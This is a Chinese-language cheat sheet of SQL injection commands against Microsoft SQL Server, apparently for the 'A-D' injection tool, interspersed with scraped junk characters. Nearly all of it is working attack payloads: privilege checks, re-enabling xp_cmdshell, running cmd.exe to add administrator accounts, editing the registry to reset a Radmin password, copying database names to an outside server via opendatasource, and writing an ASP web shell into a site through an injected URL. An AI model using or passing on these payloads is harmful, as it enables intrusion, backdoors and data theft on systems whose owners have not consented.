阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
; N" ^. t! Z: d% W/ r9 vAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
" }+ |! L/ y$ o8 X6 _3 L) {
//检测是否有读取某数据库的权限
$ \6 ]4 g+ w  I2 s3 ~% Z3 }& @2 Zand 1= (Select HAS_DBACCESS('master'))
# P: a7 u; j5 B/ ]2 mAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
/ Y$ l% \/ g- P8 d! H1 G8 v  R

- w3 Q' z  z% Q4 t数字类型
0 J) f+ h6 w3 J, n. [9 k2 `' {and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
+ p5 A* W  X8 j9 V  [% W# C- g( N( ^
! \# ^# [: j+ M1 e搜索类型
$ \3 r5 G5 f: R! `  k6 A' and char(124)%2Buser%2Bchar(124)=0 and '%'='
* W# g' R/ f/ ?5 m9 A
爆用户名
and user>0
' and user>0 and ''='

7 E% i3 n* `  K- F7 u检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
, Q1 S. E/ v; K, u% y" Y6 {
1 K& J9 S4 q" n- m检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多行
  z4 z2 I/ d! n% J; K( `9 o;declare @d int;--
; s! y& r+ o  d. L  v: \' Y- f6 \
& y* p8 I' B, ]" q恢复 xp_cmdshell
# v; E4 R- A  I4 ?;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
& b! K% y$ s7 u# g//      执行命令
4 y, m2 `8 u2 Z4 i9 m//-----------------------
: Z! m/ X6 a2 V1 [. h$ l" |首先开启沙盘模式：
7 F- |; v/ O: X2 x8 C, F; _exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
# t' s: N) ~' }5 g  }0 i
执行命令
& ~3 K' v8 ^( O2 ~;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
5 a( v0 C( n0 e: T' G
判断xp_cmdshell扩展存储过程是否存在：
# [) @$ e7 j3 `0 j2 rhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
$ @0 Y$ ^- ]7 y% c1 ?3 L& V0 g7 p
写注册表
" _, j) F; _* P5 [* Z3 s$ L' \4 Gexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

9 S6 k! A$ C# a+ a0 IREG_SZ
+ t4 q0 Z6 b5 |! y0 h: d; ~# j
- D. G, R' l9 c4 ?读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
& J2 r1 ?2 |9 z, j
读取目录内容
9 h% M0 {# n$ V* ^$ oexec master..xp_dirtree 'c:\winnt\system32\',1,1

+ m* H. S: r5 z" Y# V, V
" ~  J4 N" R( i$ [9 N# Y) K数据库备份
2 I3 x) U0 s9 T0 W, jbackup database pubs to disk = 'c:\123.bak'

5 q- J& C+ q9 U! d2 ~6 `  h//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
& D; R, q7 g6 k2 z/ J- T5 \

% t9 w" o( r1 D3 S7 n1 H8 e
9 j0 v- B" M6 D0 K% e更改sa口令方法：用sql综合利用工具连接后，执行命令：
: ~% a! P) t- r% gexec sp_password NULL,'新密码','sa'
0 Z) K% s$ G; `+ i5 x; o/ N6 y& U2 j, u0 V
添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
2 R' s. C7 h4 d
7 p8 r3 ~& m; u( A7 |, x" ^' c删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

+ ?* M* N2 t7 i& ]& L  A8 c, ~添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
) m: S% O# |$ [/ s% J; V( HGRANT exec On xp_proxiedadata TO public

, G% O% Q% q* M" P% i: S
停掉或激活某个服务。
: u* K/ _9 A: [$ A& B" ]! _
* X) r' L  Q( F; s, r' `/ texec master..xp_servicecontrol 'stop','schedule'
( E+ M8 F0 Y# \. L- Nexec master..xp_servicecontrol 'start','schedule'
7 Q6 {% H- o- H4 c1 V, v
dbo.xp_subdirs
" U! V  R4 v* X6 ?; Y1 q' W
只列某个目录下的子目录。
5 V: H5 ^: _' m1 V$ Fxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
3 W0 f" }" F2 e0 G
dbo.xp_makecab
. ]) m, i0 z' u. f+ P8 I
: Q) U+ J. [# l7 [3 ^9 E将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
1 t0 T- {5 C" D. s4 J
dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
( q/ K; q, E( u4 U  z" H* F- W'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

7 }7 s5 N1 w+ t* Sxp_terminate_process
7 X% [, t4 I* }) i8 I0 t
停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
  T- {3 J' t! p/ }2 f9 Z
xp_terminate_process 2484
% L4 S& b, W7 B. `5 M& x# I
xp_unpackcab

解开压缩档。
6 i$ g; F7 i  f# D' p6 V6 X: @2 w
8 Y! V. O7 U+ Y5 k1 X$ Cxp_unpackcab 'c:\test.cab','c:\temp',1
2 P- @* R/ S& e$ A
) G& M/ G1 b3 R: W8 k
: ^5 \$ e! [7 E6 R2 ?9 I4 i# ?某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

create database lcx;
1 O$ C$ J* d, Z- SCreate TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

3 [, }, b4 r" Q! h* M9 b! Q//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases


5 `% l  W0 i# Z) L# C& M//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
- _2 E* G1 X- M& E
用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
8 w; q& N& L# x. i9 D' A2 `* `
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
' n& q1 D  g# P2 u" G+ \! |$ x
//删除内容
0 ^! H5 ?$ {" Y( q* Tdelete from table_name where Stockid = 3